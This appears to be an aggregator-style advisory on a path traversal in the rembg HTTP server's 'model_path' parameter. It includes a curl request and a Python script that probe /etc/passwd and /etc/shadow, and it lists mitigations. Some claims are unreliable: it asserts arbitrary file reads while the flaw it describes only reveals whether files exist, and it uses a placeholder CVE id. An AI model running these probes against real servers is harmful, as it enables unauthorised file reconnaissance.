rembg HTTP Server, Path Traversal, CVE-2024-XXXX (Medium)

Listen to this Post

How the mentioned CVE works:

The vulnerability resides in rembg HTTP server’s handling of the `extras` JSON parameter.
Attackers send a crafted request with a malicious `model_path` parameter.
The `extras` parameter is parsed from URL query string without validation.
It is passed directly to `new_session()` function in s_command.py.
For custom model types like u2net_custom, the `model_path` is extracted.

In `u2net_custom.py`, `download_models()` returns `os.path.abspath(os.path.expanduser(model_path))`.

No path traversal sanitization occurs at this step.

The path then goes to `onnxruntime.InferenceSession()` in `base.py`.

This function attempts to open and read the file as an ONNX model.
If the file exists but is not a valid ONNX protobuf, an error reveals the file’s existence.
If the file does not exist, a “NoSuchFile” error discloses that.
If permissions are insufficient, “Permission denied” reveals the file’s presence.
The root cause is exposing CLI-only custom model feature to HTTP API.
No authentication or input validation protects the `model_path` parameter.
An attacker can read arbitrary system files like /etc/passwd.

Error messages act as a file existence oracle.

The attack requires only a minimal valid PNG image as the file upload.
Server logs confirm the file was read, proving successful path traversal.

dailycve form:

Platform: rembg HTTP server
Version: All versions
Vulnerability: Path traversal
Severity: Medium
date: 2026-04-11

Prediction: 2026-05-15 patch

Analytics under What Undercode Say:

Enumerate file existence via error messages
curl -X POST 'http://localhost:7000/api/remove?extras=%7B%22model_path%22%3A%22%2Fetc%2Fpasswd%22%7D' \
-F "model=u2net_custom" \
-F "file=@/tmp/test.png"
Python script to test multiple paths
import requests, json, urllib.parse
MINIMAL_PNG = bytes([0x89,0x50,0x4E,0x47,0x0D,0x0A,0x1A,0x0A,0x00,0x00,0x00,0x0D,0x49,0x48,0x44,0x52,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x08,0x02,0x00,0x00,0x00,0x90,0x77,0x53,0xDE,0x00,0x00,0x00,0x0C,0x49,0x44,0x41,0x54,0x08,0xD7,0x63,0xF8,0xFF,0xFF,0x3F,0x00,0x05,0xFE,0x02,0xFE,0xDC,0xCC,0x59,0xE7,0x00,0x00,0x00,0x00,0x49,0x45,0x4E,0x44,0xAE,0x42,0x60,0x82])
for path in ['/etc/passwd','/etc/shadow']:
extras = json.dumps({"model_path": path})
url = f"http://localhost:7000/api/remove?extras={urllib.parse.quote(extras)}"
r = requests.post(url, files={"file":("test.png",MINIMAL_PNG,"image/png")}, data={"model":"u2net_custom"})
print(path, r.text[:80])

Exploit:

Start rembg server: rembg s --host 0.0.0.0 --port 7000. Send POST request to `/api/remove` with `extras={“model_path”:”/etc/passwd”}` and a valid PNG file. Observe server error “Load model from /etc/passwd failed:Protobuf parsing failed” confirming file read.

Protection from this CVE:

  1. Disable custom models in HTTP API by filtering session names ending with _custom. 2. Validate `model_path` against an allowlist of directories (e.g., ~/.u2net). 3. Never expose rembg server directly to internet; use reverse proxy with authentication. 4. Apply vendor patch when available.

Impact:

Unauthenticated remote attackers can read arbitrary files (e.g., /etc/passwd, .env, configs), enumerate file existence and permissions, map infrastructure, and cause denial of service via large file reads. CLI and library usage unaffected.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top